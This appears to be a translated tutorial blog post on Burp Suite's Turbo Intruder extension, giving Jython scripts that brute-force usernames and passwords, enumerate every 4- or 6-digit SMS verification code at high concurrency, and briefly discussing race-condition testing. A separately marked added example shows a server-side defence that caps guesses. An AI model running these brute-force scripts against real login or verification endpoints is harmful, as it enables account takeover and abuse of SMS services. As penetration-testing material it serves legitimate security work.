Burp-TurboIntruder Turbo Intruder
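A summary of basic usage, with all the Python code written down. If anyone has clever tricks, I would love to trade notes with you all.
The video explains the underlying principles.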
Install
Extender -> BApp Store -> Turbo Intruder
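This is the approach I went with; probably because my network is terrible, the install from the Store never worked.
Basic usage
Just capture a request, right-click it and send it over.
There are two panes, upper and lower.
Let's take directory brute-forcing as the example.
Mark the point to fuzz with %s as the placeholder.
Select the injection point -> load the wordlist -> Attack
To see the speed difference compared with the regular Intruder in Burp, just try it yourself and you'll know, haha.
Since it is this fast, isn't hunting for arbitrary user registration and login issues going to be fun? I'll add case studies later (2020.11.24, 12:14)
Improving speed
To speed things up greatly, set pipeline to True.
Anyone who has studied HTTP request smuggling should already know what pipeline is (smirk).
Brute-forcing user & pass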
from urllib import quote  # Turbo Intruder scripts run under Jython 2.7

def password_brute(target, engine):
    # one %s in the request: the password
    for word in open('F:/Tools/Dict/'):
        engine.queue(target.req, quote(word.rstrip()))

def user_brute(target, engine):
    # one %s in the request: the username
    for word in open('F:/Tools/Dict/'):
        engine.queue(target.req, quote(word.rstrip()))

def user_password_brute(target, engine):
    # two %s in the request: username first, then password
    for password in open('F:/Tools/Dict/'):
        for user in open('F:/Tools/Dict/'):
            engine.queue(target.req, [quote(user.rstrip()), quote(password.rstrip())])

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    #user_brute(target, engine)
    #password_brute(target, engine)
    user_password_brute(target, engine)

def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status == 200:
        table.add(req)
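The if condition can be changed to suit your needs.
Use whichever function you need and comment out the ones you don't.
Brute-forcing numeric verification codes
The last argument is the code length: pass 4 for a 4-digit verification code, 6 for a 6-digit one.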
from itertools import product

def brute_veify_code(target, engine, length):
    pattern = '1234567890'
    # every digit string of the given length (10 ** length candidates)
    for i in product(pattern, repeat=length):
        code = ''.join(i)
        engine.queue(target.req, code)

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    brute_veify_code(target, engine, 6)

def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if 'error' not in req.response:
        table.add(req)
No demo for this one.
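The server-side counterpart to the script above, as an added example that is not from the original post: a 6-digit code has only 10^6 possible values, so the verifier has to cap failed guesses per issued code and expire it. `CodeVerifier` and `guesses_allowed` are hypothetical names, and the in-memory dict stands in for shared storage.

```python
import hmac
import secrets
import time

class CodeVerifier:
    """Server-side check for a numeric verification code (hypothetical helper)."""

    def __init__(self, length=6, max_attempts=5, ttl=300, clock=time.monotonic):
        self.length = length
        self.max_attempts = max_attempts
        self.ttl = ttl
        self.clock = clock
        self._pending = {}  # account -> [code, expires_at, failed_attempts]

    def issue(self, account):
        # CSPRNG-backed code, zero-padded so the full keyspace is used.
        code = str(secrets.randbelow(10 ** self.length)).zfill(self.length)
        self._pending[account] = [code, self.clock() + self.ttl, 0]
        return code

    def verify(self, account, guess):
        entry = self._pending.get(account)
        if entry is None:
            return "no_code"
        code, expires_at, failed = entry
        if self.clock() >= expires_at:
            del self._pending[account]
            return "expired"
        if hmac.compare_digest(code.encode(), str(guess).encode()):
            del self._pending[account]  # single use
            return "ok"
        entry[2] = failed + 1
        if entry[2] >= self.max_attempts:
            # Burn the code: later guesses fail, even the correct one.
            del self._pending[account]
            return "locked"
        return "wrong"

def guesses_allowed(verifier, account, candidates):
    """Count how many guesses are evaluated before the code is gone."""
    evaluated = 0
    for guess in candidates:
        result = verifier.verify(account, guess)
        if result in ("no_code", "expired"):
            break
        evaluated += 1
        if result in ("ok", "locked"):
            break
    return evaluated
```

The counter is keyed to the account rather than the connection, so raising concurrentConnections does not buy extra guesses; with several workers the increment has to be atomic in the shared store.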
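Concurrency vulnerabilities
Let's go straight to a real-world test for this one, haha.
One thing to watch here: concurrentConnections and the number of for-loop iterations. Try it out yourselves, haha.
The SMS-receiving platform was garbage, so in the end I tested with my own phone number, damn.
Writing a note even cost me SMS fees, I'm crying.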